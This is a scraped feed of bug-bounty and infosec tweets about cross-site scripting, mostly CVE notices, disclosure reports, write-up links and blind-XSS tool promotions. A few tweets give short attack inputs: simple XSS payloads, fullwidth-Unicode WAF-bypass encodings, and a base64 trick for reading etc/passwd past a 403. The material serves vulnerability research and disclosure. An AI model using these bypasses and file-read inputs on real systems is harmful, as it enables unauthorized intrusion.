@Hot10Securitya year agoPopular keywords used with #vulnerability tweets Date: 2023-01-29 Unique Tweets: 176 TOP 10 KEYWORDS 1: Cross 2: Site 3: Scripting 4: XSS 5: Request 6: Forgery 7: CSRF 8: CVE 9: Help 10: Desk bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1595178958689017856/HOhOvUub_normal.jpg)
أحْمَدُ مُحَمَّد
@ahmdmhamed_a year agoHi, This my write-up about bypassing CSRF protection via XSS https://t.co/Ss7TAOF7ij #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1331398503747252224/dz6QtVND_normal.jpg)
pizzapower
@pizzap0w3ra year agoFound some cool stuff lately: https://t.co/CwIt6sFUcI… https://t.co/zwc3TYI8zb… https://t.co/hf8fgWOlIl… https://t.co/yDSJDy5Uu6… Plus an SQLi in a big ecosystem. #cybersecurity #infosec #hacking
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0470): Cross-site Scripting (XSS) - Stored in modoboa/modoboa. https://t.co/QpCMQXOeZH Disclosed by https://t.co/yP3tBVjXCL, fixed by @modoboa_mail... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1344962042973794304/93BZHi0l_normal.jpg)
iSecurity
@iSecuritya year agoHow I was able to find 4 Cross-site scripting (XSS)on vulnerability disclosure program ? https://t.co/HQKGzj9OWz #bugbounty #websitesecurity #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1609310307469467650/zaiKnJra_normal.jpg)
Amr Mustafa
@Amr_MustafaAAa year agoI just published How I was able to find 4 Cross-site scripting (XSS) on vulnerability disclosure program https://t.co/KCEB07IpD5 #BugBounty #bugbountytips #CyberSecurity
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0519): Cross-site Scripting (XSS) - Stored in modoboa/modoboa. https://t.co/8w7uCZSFfC Disclosed by https://t.co/mmZxqUVyCn, fixed by @modoboa_mail... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1420073907038560259/UV7zAw7O_normal.jpg)
Jack
@Jaxon1177a year agoHi .. Anyone have any success using https://t.co/rvBJxswot4 tool? #BugBounty
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0488): Cross-site Scripting (XSS) - Stored in pyload/pyload. https://t.co/5SvRCyYr57 Disclosed by @bAuholz_, fixed by @pyload... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1576423044347723777/c9SjREd3_normal.jpg)
M1n@Cris
@Minacris890Ma year agoI found a Cross-site scripting (XSS) and bypassed the WAF (akamai) on one of the TikTok ads endpoint and could lead it to takeover any account on TikTok ads #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1598017040119365648/37ERWO1J_normal.jpg)
Ali Tütüncü
@alicanact60a year ago@bugbounty_memes It's just a Reflected XSS report template, not nuclei template or something like that 😂
![profile](https://pbs.twimg.com/profile_images/1344962042973794304/93BZHi0l_normal.jpg)
iSecurity
@iSecuritya year agoBlind XSS To SSRF https://t.co/v107lCwv5H #webapplicationsecurity #cybersecurity #bugbounty
![profile](https://pbs.twimg.com/profile_images/1557095801272373248/RmJX2gB4_normal.jpg)
RedPacket Security
@RedPacketSeca year agoHackerOne Bug Bounty Disclosure: rails-actionview-sanitize-helper-bypass-leading-to-xss-using-svg-tag-byhaqpl - https://t.co/vmPydcQxH1 #HackerOne #CVE #Vulnerability #OSINT #ThreatIntel #Cyber
![profile](https://pbs.twimg.com/profile_images/1600705047301586944/uNoJXpfG_normal.jpg)
Fares Walid
@SirBagozaa year agoPublished my .go version of xssor https://t.co/urYh2qrmwk Q: What's Xssor? A: Xssor is XSS payloads reflections in source code checker. Differences of .py version? - Quicker - Duplicated urls Skipper #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1613798309860196353/CBgJ9iKO_normal.jpg)
s3c
@s3c_krda year agoI found a Cross-site scripting (XSS) and bypassed the WAF (akamai) on one of the TikTok ads endpoint and could lead it to takeover any account on TikTok ads #BugBounty #bugbountytips https://t.co/ZFVWnjcBrg
![profile](https://pbs.twimg.com/profile_images/1554826316695814144/Qp97e98R_normal.jpg)
Anonymous H4ck3r
@AnonymousH4ck35a year agoAWESOME BUGBOUNTY TOOLS Subdomain Enumeration Port Scanning Fuzzing GraphQL/CRLF/CSRF/SQL/XSS/XXE Injections Directory Traversal Open Redirect Subdomain Takeover and more. https://t.co/JcdifiPdHX https://t.co/dBi52sMB7h
![profile](https://pbs.twimg.com/profile_images/1611746652670365696/RStyd501_normal.jpg)
Lewis
@0reoSeca year ago@SaraBadran18: RCE, SQl injection, Stored XSS in @MyBB -- Publication date :- 2023-01-25 -- By @ptswarm -- https://t.co/FrTXqlF0LK -- #hackerone #BugBounty #bugbountytips #hackeronereport #writeups #Bugbountywriteupspublished #bugbountytip https://t.co/mdTDNiDoQ4 #cyberse…
![profile](https://pbs.twimg.com/profile_images/1615635745636589569/gbAt5NNP_normal.jpg)
🐞Sara Badran
@SaraBadran18a year agoRCE, SQL injection, Stored XSS in @MyBB -- Publication date :- 2023-01-25 -- By @ptswarm -- https://t.co/6ikSFioL0r -- #hackerone #BugBounty #bugbountytips #hackeronereport #writeups #Bugbountywriteupspublished #bugbountytip https://t.co/AvKkCltRtH
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ Rails ActionView sanitize helper bypass leading to XSS using SVG tag. 👨💻 @haqpl ➟ Internet Bug Bounty 🟧 Medium 💰 $2400.0 https://t.co/36VYP3IHYG #bugbounty #bugbountytips #cybersecurity https://t.co/Ywdnjjssfd
![profile](https://pbs.twimg.com/profile_images/1617751492362121216/uwiPgsyC_normal.jpg)
Hitesh Patra
@0xdevinera year agoMade a YT video on @bxsshunter, a cool alternative to @XssHunter As you might know, #xsshunter will no longer be in support for your blind XSS hunting journey, a similar tool with additional functionality is now available. https://t.co/KpIBTTwHjs #bugbountytips #infosec
![profile](https://pbs.twimg.com/profile_images/1610367159787560961/oZSxRdxH_normal.jpg)
Abdelrhman Allam
@sl4x0a year agoResearch | Bypass CSRF Protection w/ XSS https://t.co/0OHItG5LlO #websecurity #infosec #appsec #recon #bugbountytips #bugbounty #bughunting #csrf #xss #securityresearch
![profile](https://pbs.twimg.com/profile_images/1575575364490797058/f6_XOFx5_normal.jpg)
@x1337Loser
@0xniroba year ago@0xRiy4d @yaworsk @zseano Learn basic concept of web hacking, then you Will realize which one should you learn first! Mine one is XSS then access control issue. Good luck❤️
![profile](https://pbs.twimg.com/profile_images/1438448666646253568/Ojcd-JB1_normal.png)
Dhaval Patel
@d4rk_hors3a year agofile upload to XSS #BugBounty #bugbountytips #bugbountytip #infosec #appsec #CyberSec #ethicalhacking Link: https://t.co/dqNCSBa2BI
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoHTTP Status Code for ⚡️#XSS 200, 201, 202, 203, 206 301, 302, 303, 305 400 to 417 except 407 500 to 508 #infosec
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoWhen trying for XSS if alert() is blocked you can use an alternative like⚡️. by @KathanP19 1. confirm 2. prompt 3. eval 4. write Found Some More Here👇 https://t.co/xM9XLvuoXE #infosec #cybersec #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoMassive XSS⚔️#infosec #bugbountytips #cybersecuritytips https://t.co/YFWnl92ljT
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoIn NodeJS, what is a good way of ensuring user submitted data in (text input) forms is not malicious? - Visit https://t.co/msfL5EiMOh for the answer. #xss #sql_injection #nodejs #infosec #softwaredevelopment
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ XSS at TikTok Ads Endpoint 👨💻 @s3c_krd ➟ TikTok 🟥 High 💰 N/A https://t.co/mm8iRQHM4B #bugbounty #bugbountytips #cybersecurity https://t.co/UrvByJ7DVA
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ XSS on ( █████████.gov ) Via URL path 👨💻 @Ajay_jachak24 ➟ U.S. Dept Of Defense 🟧 Medium 💰 N/A https://t.co/xYlX7r05xV #bugbounty #bugbountytips #cybersecurity https://t.co/AzMIp8hQC3
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ reflected xss in www.████████.gov 👨💻 maskedpersian ➟ U.S. Dept Of Defense 🟧 Medium 💰 N/A https://t.co/UknbNEO9qf #bugbounty #bugbountytips #cybersecurity https://t.co/kUsEDKsfKJ
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ Reflected XSS on ██████.mil 👨💻 @alishahmughal12 ➟ U.S. Dept Of Defense 🟧 Medium 💰 N/A https://t.co/UUxpYt0b1x #bugbounty #bugbountytips #cybersecurity https://t.co/lE4djAp4TT
![profile](https://pbs.twimg.com/profile_images/659444735791210500/XGvv9R-0_normal.jpg)
Ptrace Security GmbH
@ptracesecuritya year agoBypassing Cloudflare WAF: XSS via SQL Injection https://t.co/m5iR0oCz6f #Pentesting #SQLinjection #CyberSecurity #Infosec https://t.co/iq2qnnizW3
![profile](https://pbs.twimg.com/profile_images/1607362718704766980/2ObFn1bg_normal.jpg)
Sysbraykr
@sysbraykra year agoXSS/WAF/SQL filter bypass. < - %EF%BC%9C (\uff1c) > - %EF%BC%9E (\uff1e) \ - %EF%BC%BC (\uff3c) / - %EF%BC%8F (\uff0f) ' - %EF%BC%87 (\uff07) " - %EF%BC%82 (\uff02) #bypass #xss #waf #sql #SysBraykr #BugHunting #InfoSec #WeBreakIt2SecureIt
![profile](https://pbs.twimg.com/profile_images/1590779769359958016/viD-b6ex_normal.jpg)
ABHIJITH PK
@ag3n7apka year agoStored XSS #BugBounty #xss https://t.co/0EBWAQkgd3
![profile](https://pbs.twimg.com/profile_images/1557095801272373248/RmJX2gB4_normal.jpg)
RedPacket Security
@RedPacketSeca year agoHackerOne Bug Bounty Disclosure: xss-at-tiktok-ads-endpointbys3c - https://t.co/9D5hFvRIaj #HackerOne #CVE #Vulnerability #OSINT #ThreatIntel #Cyber
![profile](https://pbs.twimg.com/profile_images/1440915079147311104/0ZxUCOBz_normal.jpg)
${Manash}
@manash036a year agoRecently, I reported an open redirect (OR) vulnerability that I was able to convert to a full account takeover. Cookies had HttpOnly enabled, so was not possible to steal directly. This is what I did 🧵👇 🏃TLDR OR=>XSS=>Steal token from /sso/refresh #BugBounty #infosec (1/n)
![profile](https://pbs.twimg.com/profile_images/1384538705797554177/o0BURm0O_normal.png)
Black Hat Ethical Hacking
@secur1ty1samytha year agoOffensive Security Tool: XSSRocket XSS Rocket is written by us with the help of #ChatGPT as experimentation and is designed for Offensive Security and #XSS (Cross-Site-Scripting) attacks. Read the full post: https://t.co/ULUCMjGZBN #infosec #informationsecurity #redteam https://t.co/XCq9XFqUZe
![profile](https://pbs.twimg.com/profile_images/1607362718704766980/2ObFn1bg_normal.jpg)
Sysbraykr
@sysbraykra year agoBypassing Cloudflare WAF: XSS via SQL Injection https://t.co/ikvHmtGPfS #SysBraykr #BugHunting #InfoSec #WeBreakIt2SecureIt
![profile](https://pbs.twimg.com/profile_images/1527679268188491776/9SZ5skNk_normal.jpg)
hemi
@jookermoona year agohttps://t.co/KVrWFi2Tna
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Security2 years agoPopular keywords used with #vulnerability tweets Date: 2023-01-26 Unique Tweets: 339 TOP 10 KEYWORDS 1: Site 2: Vigil 3: Cross 4: Facebook 5: Twitter 6: Make 7: Scripting 8: XSS 9: Windows 10: CryptoAPI bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1584102861947998208/xmEdWPZm_normal.jpg)
0x999
@_0x9992 years agoCurrently working on a Burp Suite extension designed for Blind XSS injection in Headers, if anyone has any suggestions for additional features that should be added please do lmk, Here are the current features👇 (pls excuse the ugly UI, it's temporary) #bugbountytips #bugbountytip https://t.co/OWIZJCvG0R
![profile](https://pbs.twimg.com/profile_images/1573240538039746560/buTP5mKO_normal.jpg)
Muhammed Farish
@muhamedfarish2 years agohttps://t.co/zWnR15aofH #cybersecurity #bug #bugbounty #security #computerscience #networks #hacking #hacker #programming #ethicalhacking #pentesting #kalilinux #parrotos #coding #Fetlla #Medium #infosec
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Security2 years agoPopular keywords used with #vulnerability tweets Date: 2023-01-25 Unique Tweets: 403 TOP 10 KEYWORDS 1: Cross 2: Site 3: Log 4: Scripting 5: XSS 6: Google 7: Data 8: Vigil 9: VMware 10: GoTo bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_2 years agoHow to Prevent Cross-Site Scripting (XSS) Attacks #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1612799784754237440/9xFiZOhf_normal.jpg)
unpaired_electron
@Ajay_jachak242 years agoBlind XSS leads to data leakage But the Domain is out of scope.. Will they pay for this? What do you think ? #bugbountytips #BugBounty #hackerone #bugcrowd https://t.co/awg70DKiMX
![profile](https://pbs.twimg.com/profile_images/1617726926646554624/BmmPqvup_normal.jpg)
BXSS Hunter
@bxsshunter2 years agoFeel free to DM Us Issues Being Resolved - 1- XSS FIRE PAGE NOT LOADING WHEN MANY XSS FIRES HAPPENS 2- IP ADDRESS ALWAYS COMING 127.0.0.1 3- Some Minimal Issues #bxsshunter #bxss #bugbountytips #bugbounty https://t.co/171GmQ0MJE
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0y2 years agoIn case someone finds any issues on @bxsshunter feel free to dm or @bxsshunter . Update - There was server load today we handled it effectively with little down time of 5-10 minutes Signup Now At https://t.co/VRQCgNtZht #xsshunter #bxsshunter #bxss #bugbountytips #bugbounty
![profile](https://pbs.twimg.com/profile_images/1346695790132006912/RXsf_WQ3_normal.jpg)
bugbountymemes
@bugbounty_memes2 years agoMake sure you are using Trusted Service when using alternatives to XssHunter Imagine you got 50+ Payload fired but not able to login your so called XssHunter alternatives #bugbounty #xss
![profile](https://pbs.twimg.com/profile_images/1536918615320059905/H2nTRpbN_normal.jpg)
Rahmat Qurishi
@RahmatQurishi2 years agoI earned $100 for my submission on @bugcrowd 1.Signed up to main website. 2.browsed subdomains, found an endpoint that was vulnerable to xss Payload: <script>alert(origin)</script> Easy bug🙂 #ItTakesACrowd #BugBounty
![profile](https://pbs.twimg.com/profile_images/1611746652670365696/RStyd501_normal.jpg)
Lewis
@0reoSec2 years ago@ptswarm: 💬 New article by our researcher Aleksey Solovev: "MyBB <= 1.8.31: Remote Code Execution Chain". 🐞 Abusing Nested Parsers Conditions for getting XSS 🐞 From Privileged SQL Injection to RCE Read the article: https://t.co/FrTXqlF0LK #cybersecurity #infosec @0reoSec
![profile](https://pbs.twimg.com/profile_images/1480570633159380992/BZp_zCyO_normal.jpg)
PwnLab.Me
@PwnlabMe2 years agoA detailed XSS repo; https://t.co/Yyr98j65Q4 #cybersecurity #git #github #xss #bugbounty
![profile](https://pbs.twimg.com/profile_images/1616562586467684396/G-YSRH46_normal.jpg)
XSS Report
@XssReport2 years ago"We are truly delighted that you have received a reward by using our platform. We hope you will be able to receive even more beautiful rewards. Congratulations!" #xss #bugbounty via https://t.co/uVCBeExkBl https://t.co/qAkPogSvWb
![profile](https://pbs.twimg.com/profile_images/1608512503910404102/U7cKFcIc_normal.jpg)
Jefferson Gonzales
@gonzxph2 years agoXSSHunter Alternative Since the xsshunter will be deprecated this 1st of February here's the two alternative website you can try for blind xss 1. https://t.co/rHOI00NcUP 2. https://t.co/nUeMkoBwhZ by @CyberXplore #bugbountytips #BugBounty #xss
![profile](https://pbs.twimg.com/profile_images/1613160686791852036/6iWFmSgh_normal.jpg)
Cyber Zilla
@SunilAd942142932 years agoWhat tool do you use to automate blind xss??? #BugBounty #togetherwehitharder #bugbountytip
![profile](https://pbs.twimg.com/profile_images/1610626347709112321/XFrREd5N_normal.jpg)
Goziem
@g0ziem2 years agoXSS Report is another alternative. Features: 1. XSS payloads 2. Info about where the payload fired. https://t.co/tqglrLHhD7 #bxsshunter #xss #bugbountytips #bxss #xsshunter #bxss
![profile](https://pbs.twimg.com/profile_images/1364087716934078466/zRX1e_Bj_normal.jpg)
🇮🇳 ! Bõt âmît
@Botami1432 years ago### WAF / Cloudflare Bypass 25+ XSS Payloads #bugbountytips #BugBounty #bugbountytip #xss #cybersecuritytips #cybersecurity #sqlinjection #hacker #Hacking https://t.co/bfe2zuVtxI
![profile](https://pbs.twimg.com/profile_images/1576423044347723777/c9SjREd3_normal.jpg)
M1n@Cris
@Minacris890M2 years agoWhat do you use for blind XSS hits these days? I've used @XssHunter before, but since it is going to be deprecated on Feb 1 I'm looking for an alternative #bugbountytips #bugbounty #xss
![profile](https://pbs.twimg.com/profile_images/1601664448925556736/xFqeWsSg_normal.jpg)
Mike Takahashi
@TakSec2 years agoTips for getting into Bug Bounty - Part 2: 1. Pick a topic on @PortSwigger Web Security Academy, such as XSS: https://t.co/wioDWTzs9W 2. Hack the labs for that vulnerability type 3. If you can't beat one out, look at the answer and learn how it works #infosec #bugbountytips https://t.co/Eou9nDEfED
![profile](https://pbs.twimg.com/profile_images/1561977257585004544/ady7v0G4_normal.jpg)
Crazy
@0PWorld2 years agoHelp : i found XSS Payload Fired On https://t.co/oUP5NjB7ha but when i try to open url say : This site can’t be reached how can i open it look pic #infosec #cybersecurity #cybersecuritytips #bugbountytips https://t.co/XAtwOd5BTs
![profile](https://pbs.twimg.com/profile_images/1404125874350264322/6G0a9c7a_normal.jpg)
payloadartist
@payloadartist2 years agoXSS using postMessage in Google Cloud Theia notebooks https://t.co/7VDivVojGJ By @sivaneshashok @kl_sree #infosec #bugbounty #bugbountytips #Hacking #cloudsecurity https://t.co/AIKGio2V0R
![profile](https://pbs.twimg.com/profile_images/1593665222082179075/y4eFSxQ9_normal.jpg)
7h3h4ckv157
@7h3h4ckv1572 years agoThe ultimate tool for discovering and reporting vulnerabilities. With BXSSHUNTER: 📢 https://t.co/JciPPOjHtF 1- XSS HUNTER Dashboard 2- Pro XSS Reports 3- Payload Tracking 4- Host Remote Payloads 5- Learning Hub 6- Instant XSS Alerts #infosec #BugBounty #bugbountytips #xss
![profile](https://pbs.twimg.com/profile_images/1570840088397090816/rWOAH9mz_normal.jpg)
HackTube5
@HackTube52 years ago3 One line Bug Bounty Tips #BugBounty 1. Always check for common vulnerabilities such as SQL injection, XSS, and CSRF. 2. Test for both known and unknown vulnerabilities by using both manual and automated testing methods. 3. Keep an eye out for subdomains and test them as well.
![profile](https://pbs.twimg.com/profile_images/914907986568638466/j6ZJi9cC_normal.jpg)
LinuxSecurity
@lnxsec2 years agoWant to scan for XSS vulns in your websites/web apps? Then look no further than Pwn XSS, a powerful tool used by malicious hackers & security professionals alike! Learn how to install & run Pwn XSS👇https://t.co/Lf8DN6BK3G Given it a try? What do you think? #infosec #Linux
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0y2 years agoGreat news for the security community! bxsshunter by @CyberXplore is free for everyone & it has been developed for the community. #bugbountytips #xss #BugBounty #bxss #bxsshunter #blindxss #xsshunter https://t.co/dkpJfKFGhl
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0y2 years ago6- Instant XSS Alerts An Alternative To XSS Hunter From @CyberXplore For Any Queries Contact @bxsshunter or email us at [email protected] #xss #xsshunter #bxsshunter #cybersecurity #bugbountytips #bugbounty #BXSS #XSSHunter
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0y2 years agoImprove your XSS hunting with BXSSHUNTER - Join our community for xss tips, instant notifications, easy reports, and a public profile to showcase your skills. signup now at https://t.co/VRQCgNtZht & elevate your game now! #bxsshunter #xss #bugbountytips #bxss #xsshunter #bxss https://t.co/10MrLU8OeO
![profile](https://pbs.twimg.com/profile_images/1558723901621800961/skZhtP_i_normal.jpg)
x1m
@x1m_martijn2 years agoWhat do you use for blind XSS hits these days? I've used @XssHunter before, but since it is going to be deprecated on Feb 1 I'm looking for an alternative #bugbountytips #bugbounty #xss
![profile](https://pbs.twimg.com/profile_images/1297066624084672513/Y3uXhGKy_normal.jpg)
Sexcurity | Make love, not war!
@s3xcur1ty2 years agoPeeking at the Admin Dashboard of an Illicit Site (Bahasa Indonesia) - @kustirama https://t.co/4dHxxv3e9d #InfoSec #CyberSecurity #Security #XSS #BlindXSS #StoredXSS #WriteUp #BugHunting #BugBounty
![profile](https://pbs.twimg.com/profile_images/982721685609746433/hxP_vMq9_normal.jpg)
Securityblog
@Securityblog2 years agoReflected XSS Leads to 3,000$ Bug Bounty Rewards from Microsoft Forms | by Supakiad S. (m3ez) | Jan, 2023 | InfoSec Write-ups https://t.co/I1eFfLxuzw
![profile](https://pbs.twimg.com/profile_images/1557290969766457344/xoSk7tPH_normal.jpg)
Pentester Academy
@SecurityTube2 years agoEver wanted to know how XSS attacks work? Try it hands-on, for free! In this lab exercise, you will pentest a vulnerable web application with the XSSer tool. Sign in at https://t.co/vfBZUZ9khb and get started at https://t.co/9eVbY19yLq #XSS #pentest #infosec https://t.co/PWE3GGCeUB
![profile](https://pbs.twimg.com/profile_images/1424030409910747142/hIxFunDl_normal.jpg)
Nur Rokhim
@Noerrokhim19972 years agoXSS on the https://t.co/XtCggaGaGi Full video: https://t.co/Q7CvRc2nuk #cyber #BugBounty #cybersecurity # https://t.co/SmZmzUDaQp
![profile](https://pbs.twimg.com/profile_images/1573240538039746560/buTP5mKO_normal.jpg)
Muhammed Farish
@muhamedfarish2 years agohttps://t.co/MGw3kjtWKf #cybersecurity #bug #bugbounty #security #computerscience #networks #hacking #hacker #programming #ethicalhacking #pentesting #kalilinux #parrotos #coding #Fetlla #Medium #infosec
![profile](https://pbs.twimg.com/profile_images/1595328943753756672/f5H9Ushy_normal.jpg)
Lu3ky13
@lu3ky132 years agoYay, I was awarded a $3100 bounty on @Hacker0x01! https://t.co/JRIv8Fju4i #TogetherWeHitHarder the first time I submitted an xss like this ><script>alert(1)</script> I bypassed JSON response second, after the fixed bug, I found a bypass with its payload #BugBounty #bugtips
![profile](https://pbs.twimg.com/profile_images/1614833164895100929/qcxGFmuZ_normal.png)
Marcos Furquim
@markinfurkin2 years agoOne more for the bug bounty #BugBounty #reverseengineering #xss https://t.co/4fajTQNS1Z
![profile](https://pbs.twimg.com/profile_images/1557095801272373248/RmJX2gB4_normal.jpg)
RedPacket Security
@RedPacketSec2 years agoHackerOne Bug Bounty Disclosure: xss-on-link-and-window-openerbypisarenko - https://t.co/uKxdZcWtSf #HackerOne #CVE #Vulnerability #OSINT #ThreatIntel #Cyber
![profile](https://pbs.twimg.com/profile_images/1516186231083876352/ahW_7jzj_normal.jpg)
Thee Eclipse
@Thee_Eclipse2 years agoA simple straight forward DOM XSS exploit in #jQuery at @PortSwigger by @intigriti #XSS #Hacking #hackingtools #intigriti https://t.co/a1RE8wgTSO
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Disclosed2 years ago⚡ XSS on link and window.opener 👨💻 pisarenko ➟ Slack 🟧 Medium 💰 $1000.0 https://t.co/T2K6IuaMPD #bugbounty #bugbountytips #cybersecurity https://t.co/JeeeVS3Lab
![profile](https://pbs.twimg.com/profile_images/1617282451549872129/eZ2MHxu2_normal.jpg)
Сомьядип Мандал👾
@wtf_yodhha2 years agoCredit @GodfatherOrwa url/?f=etc/passwd ==> 403 encode etc/passwd as base64 url/?f=L2V0Yy9wYXNzd2Q= ==> 200 #note you can use this trick in SQL , SSTI , XSS , LFI , Etc... #bugbountytips #bugbountytip https://t.co/c885FZ578v
![profile](https://pbs.twimg.com/profile_images/1068000400068902912/Ou19T91q_normal.jpg)
BlackClover
@Bc10ver2 years agoTop story: @GodfatherOrwa: 'url/?f=etc/passwd ==> 403 encode etc/passwd as base64 url/?f=L2V0Yy9wYXNzd2Q= ==> 200 #note you can use this trick in SQL , SSTI , XSS , LFI , Etc... #bugbountytips #bugbountytip ' https://t.co/KNEOJ3hXJo, see more https://t.co/neOMbBi5Ty
![profile](https://pbs.twimg.com/profile_images/1543995467927027712/HZ1bs4IU_normal.jpg)
Begin n Bounty
@beginnbounty2 years agoIf the input is being reflected in a JavaScript context and is being passed through the encodeURIComponent function, it is possible to use certain characters to bypass the encoding and potentially execute an XSS attack. #AppSec #infosec
![profile](https://pbs.twimg.com/profile_images/1615189162855997440/uAxj5eaz_normal.jpg)
Godfather Orwa 🇯🇴
@GodfatherOrwa2 years agourl/?f=etc/passwd ==> 403 encode etc/passwd as base64 url/?f=L2V0Yy9wYXNzd2Q= ==> 200 #note you can use this trick in SQL , SSTI , XSS , LFI , Etc... #bugbountytips #bugbountytip https://t.co/vEd2UdjTMi
![profile](https://pbs.twimg.com/profile_images/1609078042554667008/9qSUFTXl_normal.jpg)
Rohan.exe 🖤
@roohaa_n2 years agoYay, I was awarded a $550 bounty on @Hacker0x01! My First bounty ever :) Tip : Use your blind xss payload every where in contact form or in customer support #TogetherWeHitHarder #bugbounty #bugbountytips https://t.co/Q8lMOrKGR1
![profile](https://pbs.twimg.com/profile_images/1344962042973794304/93BZHi0l_normal.jpg)
iSecurity
@iSecurity2 years agoUnderstanding the XSS Threat: A Comprehensive Guide to DOM Based Cross Site Scripting Vulnerability https://t.co/HSLW4e0hSX #cybersecurity #hacking #bugbounty
![profile](https://pbs.twimg.com/profile_images/1578478250585563136/Hh9_cDXc_normal.jpg)
Amit Kumar🇮🇳
@Amitlt22 years agoUnderstanding the XSS Threat: A Comprehensive Guide to DOM Based Cross Site Scripting Vulnerability. #CyberSecurity #BugBounty #bugbountytip #xss #Hacking https://t.co/U10mMLB6Yd
![profile](https://pbs.twimg.com/profile_images/878331088686297088/RvmSU7y4_normal.jpg)
Linux Security Labs
@LSELabs2 years agoTool review: Pybelt (pentest toolkit) #xss #infosec #tools https://t.co/NRf1kIPJgV
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroup2 years agoFind hidden GET parameters in javascript files #bugbountytips #BugBounty #bugbountytip #xss #cybersecuritytips #cybersecurity #sqlinjection #hacker #Hacking https://t.co/P6AXRYz4L8
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks2 years ago(CVE-2023-0410): Cross-site Scripting (XSS) - Generic in builderio/qwik. https://t.co/rDeKNXZYUP Disclosed by https://t.co/I1YxmrfsDA, fixed by @adamdbradley... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Security2 years agoPopular keywords used with #vulnerability tweets Date: 2023-01-22 Unique Tweets: 167 TOP 10 KEYWORDS 1: Cross 2: Site 3: Scripting 4: XSS 5: Request 6: Forgery 7: CSRF 8: WP 9: Injection 10: SQL bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1554247466559717379/ARwP_88G_normal.jpg)
Pepe Venegas
@Pepe_V102 years agoCross-site Scripting - I have just completed this room: https://t.co/dFqbfD0yt2 #tryhackme #XSS #Cross-Site Scripting #DOM #Reflected XSS #Stored XSS #Blind XSS #Polyglot #xssgi via @realtryhackme #Security #ethicalhacking #Hacking #hacker #hackers #IT #learning
![profile](https://pbs.twimg.com/profile_images/1081057521719078912/OqWfdeQ6_normal.jpg)
azu
@azu_re2 years agoLooking at: "Reflected XSS Leads to 3,000$ Bug Bounty Rewards from Microsoft Forms | by Supakiad S. (m3ez) | Jan, 2023 | InfoSec Write-ups" https://t.co/xOemcB0IvJ
![profile](https://pbs.twimg.com/profile_images/1598179360900780034/Gywep4k9_normal.jpg)
Het Mehta
@hetmehtaa2 years agoReflected XSS Leads to 3,000$ Bug Bounty Rewards from Microsoft Forms #Infosec #BugBounty #CyberSecurity #xss https://t.co/Fls9DX4e1D
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
